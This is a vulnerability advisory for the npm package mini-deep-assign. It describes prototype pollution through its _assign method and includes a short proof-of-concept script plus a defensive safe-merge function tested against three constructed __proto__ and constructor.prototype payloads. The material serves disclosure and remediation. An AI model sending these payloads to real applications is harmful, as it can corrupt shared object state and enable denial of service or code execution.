Vulnerabilities: 1 via 1 paths

Dependencies: 2

Source: GitHub

Commit: ab891571


high severity

Improper Control of Dynamically-Managed Code Resources

  • Vulnerable module: mini-deep-assign
  • Introduced through: mini-deep-assign@0.0.8

Detailed paths

  • Introduced through: require-dir-all@alykoshin/require-dir-all#ab891571b3737f4b83f2836fca0530d12e4ee1c3 mini-deep-assign@0.0.8

Overview

mini-deep-assign is a library that works like Object.assign(), but recursively.

Affected versions of this package are vulnerable to Improper Control of Dynamically-Managed Code Resources (prototype pollution) through the _assign method: because _assign recursively copies keys such as __proto__ from the source object, an attacker-controlled source can add or overwrite properties on Object.prototype. An attacker can execute arbitrary code or disrupt service by manipulating object properties.

PoC

(async () => {
  const lib = await import('mini-deep-assign');

  // Attacker-controlled input: JSON.parse creates an own "__proto__" key
  var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
  var victim = {};
  console.log("Before Attack: ", JSON.stringify(victim.__proto__));
  try {
    // Merging BAD_JSON writes "polluted" onto Object.prototype
    lib.default({}, BAD_JSON);
  } catch (e) { }
  console.log("After Attack: ", JSON.stringify(victim.__proto__));
  // Clean up the polluted prototype
  delete Object.prototype.polluted;
})();

Remediation

There is no fixed version for mini-deep-assign.
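Since no fixed version exists, the practical mitigation is to replace the call with a recursive assign that cannot reach a prototype. The following is an added example written for this page; it is not code from mini-deep-assign or its author, and the names safeDeepAssign, isPlainObject, UNSAFE_KEYS, PAYLOADS and mergeAndCheck are assumptions. It skips the keys that can reach Object.prototype (__proto__, constructor, prototype), copies only own enumerable properties, and never recurses into an inherited property of the target. mergeAndCheck runs it against constructed payloads in the shape the PoC above uses and reports whether a fresh object gained the polluted property.

```javascript
// Added example (not mini-deep-assign's code): a recursive assign that refuses
// to write through keys that reach Object.prototype.
const UNSAFE_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// True only for objects created by {} / JSON.parse / Object.create(null).
function isPlainObject(value) {
  if (value === null || typeof value !== 'object') return false;
  const proto = Object.getPrototypeOf(value);
  return proto === Object.prototype || proto === null;
}

// Recursively copy each source into target with Object.assign-like semantics
// for plain objects, but never through a prototype-reaching key.
function safeDeepAssign(target, ...sources) {
  for (const source of sources) {
    if (!isPlainObject(source)) continue;
    for (const key of Object.keys(source)) {      // own enumerable keys only
      if (UNSAFE_KEYS.has(key)) continue;         // drop __proto__ & friends
      const value = source[key];
      if (isPlainObject(value)) {
        // Recurse into an existing *own* plain object only; otherwise start
        // fresh so an inherited property of target is never descended into.
        const existing =
          Object.prototype.hasOwnProperty.call(target, key) && isPlainObject(target[key])
            ? target[key]
            : {};
        target[key] = safeDeepAssign(existing, value);
      } else {
        target[key] = value;
      }
    }
  }
  return target;
}

// Constructed payloads (not real data) in the shape of the advisory's PoC:
// direct __proto__, the constructor.prototype route, and a nested __proto__.
const PAYLOADS = [
  '{"__proto__":{"polluted":true}}',
  '{"constructor":{"prototype":{"polluted":true}}}',
  '{"nested":{"__proto__":{"polluted":true}}}',
];

// Merge each payload into a fresh object with assignFn and report whether a
// brand-new {} then sees a "polluted" property, i.e. Object.prototype changed.
function mergeAndCheck(assignFn) {
  return PAYLOADS.map((json) => {
    assignFn({}, JSON.parse(json));
    const polluted = 'polluted' in {};
    delete Object.prototype.polluted; // undo any damage if assignFn was unsafe
    return polluted;
  });
}

console.log('pollution per payload:', mergeAndCheck(safeDeepAssign)); // [false, false, false]
```

The same mergeAndCheck harness can be pointed at any merge or assign helper in a code base to confirm it rejects these shapes before the helper is allowed to process untrusted JSON; an allow-list of expected keys at the parsing boundary is a complementary control.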
